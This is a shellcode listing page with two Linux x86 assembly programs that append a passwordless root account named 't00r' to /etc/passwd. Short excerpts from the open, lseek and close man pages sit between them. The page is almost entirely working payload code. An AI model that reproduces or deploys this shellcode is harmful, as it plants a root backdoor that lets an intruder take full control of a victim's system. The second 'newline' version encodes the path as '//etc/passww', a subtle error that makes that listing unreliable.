Linux/x86 - Add Root User (t00r) To /etc/passwd Shellcode (82 bytes)

(Updated: )
,
reference Linux/x86 - Add Root User (t00r) To /etc/passwd Shellcode (82 bytes)
shellcode.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
global _start

section .text
_start:
    xor eax, eax
    push eax                ; 0x0
    push 0x64777373
    push 0x61702f63
    push 0x74652f2f         ; "//etc/passwd"
    mov ebx, esp
    lea ecx, [eax+0x2]      ; mov ecx, 0x2
    lea eax, [eax+0x5]      ; open
    int 0x80                ; open("//etc/passwd", O_RDWR)

    mov ebx, eax            ; fd
    xchg edx, ecx           ; edx: SEEK_END
    xor ecx, ecx
    mov al, 0x13            ; lseek(fd, 0, SEEK_END)
    int 0x80

    push ecx
    push 0x68732f6e
    push 0x69622f3a
    push 0x2f3a3a30
    push 0x3a303a3a
    push 0x72303074
    lea eax,[ecx+0x4]
    mov ecx,esp
    mov dl,0x14
    int 0x80                ; write(fd, address of the payload, 20)

    xor eax, eax
    mov al, 0x6             ; close
                            ; ebx: fd
    int 0x80                ; close(fd)

    inc eax
    int 0x80

open(2) flags O_RDWR

man 2 open:

The mode argument specifies the file mode bits to be applied when a new file is created. If neither O_CREAT nor O_TMPFILE is specified in flags, then mode is ignored (and can thus be specified as 0, or simply omitted).

lseek:

lseek
1
2
3
4
#include <sys/types.h>
#include <unistd.h>

off_t lseek(int fd, off_t offset, int whence);

seek(2) whence:

  • SEEK_SET (0x0)
  • SEEK_CUR (0x1)
  • SEEK_END (0x2)

close:

close
1
2
3
#include <unistd.h>

int close(int fd);

Here’s the modified version to just add a newline:

shellcode-2.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
global _start

section .text
_start:
    mov dx, 0xff
    xor eax, eax
    push eax
    push 0x77777373
    push 0x61702f63
    push 0x74652f2f
    mov ebx, esp
    lea ecx, [eax+0x2]
    lea eax, [eax+0x5]      ; open
    int 0x80

    mov ebx, eax
    xchg edx, ecx
    xor ecx, ecx
    mov al, 0x13            ; lseek
    int 0x80

    push ecx
    xor eax, eax
    mov al, 0x0a
    push eax
    push 0x68732f6e
    push 0x69622f3a
    push 0x2f3a3a30
    push 0x3a303a3a
    push 0x72303074
    lea eax,[ecx+0x4]       ; write
    mov ecx,esp
    mov dl,0x15
    int 0x80

    xor eax, eax
    mov al, 0x6             ; close
    int 0x80

    inc eax
    int 0x80